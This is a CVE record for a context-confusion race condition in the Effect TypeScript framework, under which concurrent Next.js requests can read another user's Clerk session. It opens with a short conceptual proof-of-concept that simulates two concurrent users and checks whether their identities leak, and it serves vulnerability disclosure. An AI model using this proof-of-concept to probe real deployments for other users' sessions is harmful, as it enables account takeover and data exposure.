CVE-2026-32887

// Conceptual PoC for Context Confusion in Effect-TS const { Effect } = require("effect"); const clerk = require("@clerk/nextjs/server"); const express = require("express"); const app = express(); async function simulateVulnerableEndpoint() { // Simulate two concurrent requests from different users const userA = { id: "user_A", token: "token_A" }; const userB = { id: "user_B", token: "token_B" }; // Simulate requests hitting the server concurrently const results = await Promise.all([ // Request 1: User A tries to get their profile makeRequest(userA), // Request 2: User B tries to get their profile makeRequest(userB) ]); console.log("User A received data for:", results[0].userId); console.log("User B received data for:", results[1].userId); // Vulnerability condition: User A might receive User B's data if (results[0].userId === userB.id) { console.log("VULNERABILITY CONFIRMED: Context Confusion detected!"); } } // Mocking the vulnerable handler behavior async function makeRequest(userContext) { // In the vulnerable version, Effect.runPromise might not properly // inherit the AsyncLocalStorage context from the HTTP request. return Effect.runPromise( Effect.tryPromise(async () => { // This call relies on AsyncLocalStorage to get the current user // In the bug, it might read the context from a concurrent fiber const auth = await clerk.auth(); return { userId: auth.userId }; }) ); } simulateVulnerableEndpoint();

{"cve": {"id": "CVE-2026-32887", "sourceIdentifier": "[email protected]", "published": "2026-03-20T22:16:27.980", "lastModified": "2026-04-14T18:41:28.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Effect is a TypeScript framework that consists of several packages that work together to help build TypeScript applications. Prior to version 3.20.0, when using `RpcServer.toWebHandler` (or `HttpApp.toWebHandlerRuntime`) inside a Next.js App Router route handler, any Node.js `AsyncLocalStorage`-dependent API called from within an Effect fiber can read another concurrent request's context — or no context at all. Under production traffic, `auth()` from `@clerk/nextjs/server` returns a different user's session. Version 3.20.0 contains a fix for the issue."}, {"lang": "es", "value": "Effect es un framework de TypeScript que consta de varios paquetes que trabajan juntos para ayudar a construir aplicaciones TypeScript. Antes de la versión 3.20.0, al usar `RpcServer.toWebHandler` (o `HttpApp.toWebHandlerRuntime`) dentro de un gestor de rutas del App Router de Next.js, cualquier API de Node.js dependiente de `AsyncLocalStorage` llamada desde dentro de una fibra de Effect puede leer el contexto de otra solicitud concurrente — o ningún contexto en absoluto. Bajo tráfico de producción, `auth()` de `@clerk/nextjs/server` devuelve la sesión de un usuario diferente. La versión 3.20.0 contiene una solución para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:effectful:effect:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.20.0", "matchCriteriaId": "720488DF-FC4E-43E2-9D3B-5FB783EF8BEC"}]}]}], "references": [{"url": "https://github.com/Effect-TS/effect/security/advisories/GHSA-38f7-945m-qr2g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}